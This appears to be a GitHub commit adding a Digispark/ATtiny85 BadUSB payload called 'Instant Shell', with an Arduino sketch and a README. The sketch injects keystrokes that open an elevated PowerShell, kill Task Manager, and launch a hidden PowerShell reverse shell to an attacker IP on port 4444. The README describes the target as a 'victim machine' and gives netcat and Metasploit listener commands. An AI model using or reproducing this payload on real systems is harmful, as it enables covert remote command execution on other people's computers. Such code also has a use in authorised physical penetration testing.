Merge pull request #16 from hum4nG0D/hum4ng0d

hum4ng0d
This commit is contained in:
Muhammad Talha Khan 2021-10-10 15:26:46 +05:00 committed by GitHub
commit ddf1988d96
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 59 additions and 0 deletions

BIN
payloads/.DS_Store vendored Normal file

Binary file not shown.

View File

@ -0,0 +1,33 @@
#include "DigiKeyboard.h"
#define KEY_TAB 0x2b
void setup() {
pinMode(1, OUTPUT); //LED on Model A
}
void loop() {
DigiKeyboard.update();
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); //run
DigiKeyboard.delay(500);
DigiKeyboard.println("taskmgr"); //starting taskmgr
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_F, MOD_ALT_LEFT);
DigiKeyboard.sendKeyStroke(KEY_N);//run
DigiKeyboard.delay(2000);
DigiKeyboard.print("powershell -noexit -command \"mode con cols=18 lines=1\"");//start tiny PowerShell
DigiKeyboard.sendKeyStroke(KEY_TAB);
DigiKeyboard.sendKeyStroke(KEY_SPACE);//turn on admin privileges
DigiKeyboard.sendKeyStroke(KEY_ENTER); //run
DigiKeyboard.delay(5000);
DigiKeyboard.println("taskkill /IM \"taskmgr.exe\" /F ");//killing taskmanager
DigiKeyboard.delay(2000);
DigiKeyboard.println("cmd");//run cmd
DigiKeyboard.delay(2000);
DigiKeyboard.println(F("powershell -windowstyle hidden -command \"$client = New-Object System.Net.Sockets.TCPClient('<YOUR_IP_ADDRESS>',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"")); //powershell to attacker
DigiKeyboard.delay(5000);
digitalWrite(1, HIGH); //turn on led when program finishes
DigiKeyboard.delay(90000);
digitalWrite(1, LOW);
DigiKeyboard.delay(5000);
}

View File

@ -0,0 +1,26 @@
# Instant Shell
### Description:
#### 1: Instant_Shell.ino:<br>
Starting instant shell to an attacker machine in less than 1 minute.<br>
**Payload by:** [hum4nG0D](https://github.com/hum4nG0D/)
Get instant interactive reverse powershell shell in less than a minute and send commands remotely to victim machine. Interactive reverse Powershell shell script from [Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html)
**Instructions:**
Start an nc listener or metasploit listener. Be sure to change IP and Port. Adjust script delay which suits best to your computer.
```
nc -lvnp 4444
```
```
msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP_ADDRESS>; set lport 4444; set ExitOnSession false; exploit -j"
```
**Tested on:**<br>
**OS**: Windows 10|11<br>
**User**: Admin/Normal User<br>
**Hardware**: ATtiny85